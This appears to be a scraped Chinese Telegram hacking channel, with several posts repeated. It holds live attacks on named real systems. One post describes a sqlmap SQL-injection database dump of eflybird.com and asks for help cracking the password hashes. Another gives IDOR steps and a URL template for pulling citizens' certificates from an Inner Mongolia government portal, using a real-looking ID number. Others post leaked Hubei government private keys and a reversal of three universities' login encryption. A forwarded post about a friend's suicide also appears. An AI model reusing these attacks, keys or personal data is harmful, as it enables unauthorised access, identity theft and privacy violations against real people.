支付宝苹果免密漏洞.pdf
10.9 MB
一名Java 后端开发工程师,同时也是电信诈骗受害者,披露了一起涉及 “苹果 + 支付宝免密支付授权” 的严重安全问题。
受害者在完全不知情的情况下,仅一次 0.1 元操作,就被连续盗刷 999 元两笔。
@Yuhui_ddos 👏👏👏
受害者在完全不知情的情况下,仅一次 0.1 元操作,就被连续盗刷 999 元两笔。
@Yuhui_ddos 👏👏👏
🤯13❤3
目标链接:http://eflybird.com/products_list.php?nid=19
技术栈:
sqlmap一扫果然有货(依旧御三家,我是不是不应该再玩sql注入了?换一个别的玩玩?)一个一个布尔盲注、一个联合注入,因为联合查询的存在,基本可以判断无WAF,直接开始脱库(本次只脱了一部分)
成功获取数据库,叫
其中的user十分肥美啊!(篇幅限制原因这里不展示,自行查看压缩包)
密码还是MD5加密,暴力破解燃尽了,rockyou没出,许愿有人为我破解
总结:很典的sql注入,不过多解释了。对了我就是个渗透兴趣爱好者,我玩玩这种小站就好~
作者: @Yuhui_ddos
技术栈:
PHP 5.2.17, Apache,MySQL >= 5.0.12
在对目标进行信息收集中,发现 http://eflybird.com/products_list.php?nid=19 这个URL存在注入风险,毕竟依赖后端嘛wwwwsqlmap一扫果然有货(依旧御三家,我是不是不应该再玩sql注入了?换一个别的玩玩?)一个一个布尔盲注、一个联合注入,因为联合查询的存在,基本可以判断无WAF,直接开始脱库(本次只脱了一部分)
成功获取数据库,叫
bdm252107493_db其中的user十分肥美啊!(篇幅限制原因这里不展示,自行查看压缩包)
密码还是MD5加密,暴力破解燃尽了,rockyou没出,许愿有人为我破解
总结:很典的sql注入,不过多解释了。对了我就是个渗透兴趣爱好者,我玩玩这种小站就好~
作者: @Yuhui_ddos
❤6
内蒙古 名下证
不动产 身份证 结婚证 等等...
蒙古个人政务上传地址
来自个人证件
空查询如:
选择好 电子证照
我们去
https://zwfw.nmg.gov.cn/personal_center/getPersonCard?curr=1&pageSize=10®ionCode=&keyword=&_=1766256805566
=============
知道: 内蒙古政务服务网个人中心证照接口链接,需登录 + 通过官网入口访问
重点 重点 重点 重点
回到查询个人证照:
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do
互联网政务服务门户后台管理系统
我们需要一个完整的 请求方式
我们知道了 模板url
我们回到上面的 第一个url 通过证照 我们可以获得
materialOid 和 netCaseId 两个参数假设参数是
applicantCardNumber 证件号
我们用 150428199212114715 来演示
组合起来我们可以获得这样一个url
如图
还有更多的玩法 自行发觉
ps: 好消息内蒙古名下证照 坏消息 内蒙古人不上网
不动产 身份证 结婚证 等等...
蒙古个人政务上传地址
来自个人证件
https://zwfw.nmg.gov.cn/elec/namelist?name=
空查询如:
件办理\"},{\"defineAuthorityName\":\"中华人民共和国公安部\",\"certificateHolderCategory\":\"1\",\"subjectId\":\"8FBEB09982DCF90FE050817B0CFE27AB\",\"certificateTypeName\":\"户口迁移证\",\"validityRange\":\"长期
选择好 电子证照
我们去
https://zwfw.nmg.gov.cn/personal_center/getPersonCard?curr=1&pageSize=10®ionCode=&keyword=&_=1766256805566
=============
知道: 内蒙古政务服务网个人中心证照接口链接,需登录 + 通过官网入口访问
({"msg":"success","state":200,"data":{"head":{"message":"未找到匹配的证照信息","status":"10"},"data":{"total":0,"size":0,"page":0,"cell":null}}})
重点 重点 重点 重点
回到查询个人证照:
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do
互联网政务服务门户后台管理系统
我们需要一个完整的 请求方式
申请人证件号码
申请人
材料唯一标识 ID
材料
网上办件 ID
{
"链接用途": "内蒙古政务服务网材料库信息查询接口",
"参数列表": [
{
"参数名": "applicantCardNumber",
"参数值": "150428199212114715",
"含义": "申请人证件号码(18位身份证号)"
},
{
"参数名": "materialOid",
"参数值": "ff8080817de68dd1017dea2074b952e0",
"含义": "材料唯一标识ID(系统内部定位具体材料)"
},
{
"参数名": "netCaseId",
"参数值": "8a8c970a9b2f8544019b3d0b667b232f",
"含义": "网上办件ID(对应具体政务申请记录)"
}
]
}
我们知道了 模板url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=内容一&materialOid=内容二&netCaseId=内容三
我们回到上面的 第一个url 通过证照 我们可以获得
materialOid 和 netCaseId 两个参数假设参数是
材料唯一标识ID
ff8080817de68dd1017dea2074b952e0
网上办件ID
8a8c970a9b2f8544019b3d0b667b232f
applicantCardNumber 证件号
我们用 150428199212114715 来演示
组合起来我们可以获得这样一个url
https://zwfw.nmg.gov.cn/wz/unifiedHttpservice/queryZLKMaterials.do?applicantCardNumber=150428199212114715&materialOid=ff8080817de68dd1017dea2074b952e0&netCaseId=8a8c970a9b2f8544019b3d0b667b232f
如图
还有更多的玩法 自行发觉
ps: 好消息内蒙古名下证照 坏消息 内蒙古人不上网
❤1🤔1
小米所谓的超级小爱再每次启动时都会向https://i.xiaomixiaoai.com/api/suggest/dispatch/oauth/proxy POST巨额包含用户隐私信息的内容,高危的包括但不限于:
· 设备ID(设备唯一识别码,可用于长期追踪)
· 用户ID(用户账户识别码,可关联到个人账号)
· 应用包名和版本(显示正在使用的具体应用)
· 设备型号(具体硬件型号信息)
其他的:
· Android系统版本(12)
· MIUI系统版本(14)
· 操作系统具体版本(22.10.26)
· 小米AI服务版本信息
· 20项系统设置状态(蓝牙、WiFi、位置服务等开关状态)
· 隐私设置(个性化推荐开关)
· 当前运行的应用活动页面
· 第三方应用查询信息(本次为空)
· 设备ID(设备唯一识别码,可用于长期追踪)
· 用户ID(用户账户识别码,可关联到个人账号)
· 应用包名和版本(显示正在使用的具体应用)
· 设备型号(具体硬件型号信息)
其他的:
· Android系统版本(12)
· MIUI系统版本(14)
· 操作系统具体版本(22.10.26)
· 小米AI服务版本信息
· 20项系统设置状态(蓝牙、WiFi、位置服务等开关状态)
· 隐私设置(个性化推荐开关)
· 当前运行的应用活动页面
· 第三方应用查询信息(本次为空)
❤13😍6🤨5🤯2🤩1
湖北政务 解密
===============================
#登录所用的公钥
login_publicKey = 047a877a8fb4a8174f6d85659f06c5d266d5ca18f417cb858583fd008616b36c3bb5a8d10a954eb38ea62a0026c008302614ae968903eb7a3d1514602fd6b64cb5
#登录所用的私钥
#login_privateKey = b3abbd79d78692ef4b2fd27989c9c33aa5e7d6b43fa8c4b873985e148910d136
#前端接口加解密公钥和私钥
#encrypt_public_key=0460ff66ae5bbcf43ceab417632ed56400c730126b2f59da55f87f34c674bc728224d51620c67567b10bd7391a3f0698fe6d1eaa73f81168ef7a95836bdf05e19a
decrypt_private_key=6d8699e0fc0ef912c3c82cdcd81b2f4ac27608643bc582508779b338877f90b4
#随州电子证照地址
(全省)
dzzz_url=http://172.16.4.4:8090
#为某个流程配置子模块
djlxChildren_111310=个人房屋抵押,企业房屋抵押
djlxChildren_140319 = 企业不动产抵押注销登记,个人不动产抵押注销登记
djlxChildren_130300,41 = 个人新房办证(全款),企业新房办证(全款)
djlxChildren_190303 = 企业不动产权属证书遗失补办登记,个人不动产权属证书遗失补办登记,企业不动产权属证书换证登记,个人不动产权属证书换证登记
djlxChildren_190308 = 个人不动产证明遗失补办,企业不动产证明遗失补办
#需判断证号所对应的权利人和当前账号是否一致
qlrisconsistent=113100,190303,190308
#证书查验当前登录人信息是否需要回填0否1是
isbackfill=0
===============================
#为某个流程配置子模块
djlxChildren_111310=个人房屋抵押,企业房屋抵押
djlxChildren_140319 = 企业不动产抵押注销登记,个人不动产抵押注销登记
djlxChildren_130300,41 = 个人新房办证(全款),企业新房办证(全款)
djlxChildren_190303 = 企业不动产权属证书遗失补办登记,个人不动产权属证书遗失补办登记,企业不动产权属证书换证登记,个人不动产权属证书换证登记
djlxChildren_190308 = 个人不动产证明遗失补办,企业不动产证明遗失补办
❤13👏1
三大学DES加解密.txt
26.2 KB
东北大学 大连理工大学 安徽大学
同理加密内容 在获取登录或其他填写获取到的网络请求
(login)中rsa其中就是包含有名文
但是内部是有处理的
前端的JOUERY的框架有 $("#rsa").val(u+p+lt); 这样的内容
通过快捷搜索也可以看到 enc 内容
u : strEnc(u , '1' , '2' , '3') ,
p : strEnc(p , '1' , '2' , '3')
经过跳转就可以看到
var leng = data.length;
var encData = "";
var firstKeyBt,secondKeyBt,thirdKeyBt,firstLength,secondLength,thirdLength;
这样的内容 基本上我们也知道了他的核心点
===================
同理加密内容 在获取登录或其他填写获取到的网络请求
(login)中rsa其中就是包含有名文
比如: asdfgh 123456
rsa: asdfgh123456LT-13945240-9LF60zXoWKigsdvdrDDoK6Dtuf3R3c-tpass
lt: LT-13945240-9LF60zXoWKigsdvdrDDoK6Dtuf3R3c-tpass
但是内部是有处理的
前端的JOUERY的框架有 $("#rsa").val(u+p+lt); 这样的内容
通过快捷搜索也可以看到 enc 内容
u : strEnc(u , '1' , '2' , '3') ,
p : strEnc(p , '1' , '2' , '3')
经过跳转就可以看到
var leng = data.length;
var encData = "";
var firstKeyBt,secondKeyBt,thirdKeyBt,firstLength,secondLength,thirdLength;
这样的内容 基本上我们也知道了他的核心点
DES加密和解密
$.post("device" , {
d : murmur ,
d_s : murmur_s ,
d_md5 : murmur_md5 ,
m : '1' ,
u : strEnc(u , '1' , '2' , '3') ,
p : strEnc(p , '1' , '2' , '3')
===================
function finallyPermute(endByte){...}
function getBoxBinary(i):string
generate 16 keys for xor...*/
function generateKeys(keyByte){...}
Lt ="LT-2849329-7aTZ9hI9pcopicc94KCncYNzpDFXHG-tpass"
U=
"测试内容"I
p=
"测试内容"
u2 = strEnc(u,firstKey:'1*
secondKey:'2', thirdKey:'3')
p2 =strEnc(p,
firstKey:"1*
secondKey:"2', thirdKey:'3')
console.log(u2)
console.log(p2)
❤8🤩4
Forwarded from 伤肝肾的小窝 (七科)
今天是你离开的第一天,我回想了很多关于我们之间的故事。我认为我是一个极其冷血的动物,对于你是否自杀成功与否,我并没有对你的回归抱太大希望。我认为你对这个世界失望透顶,自杀对于你来说甚至是一种享受。当我知道你再也不会回来后,我的大脑告诉我我应该哭泣,去为你难过,但是我并没有这样做,我只是为你的离开感到了遗憾和惋惜。
晚安,伤肝肾
❤13👌2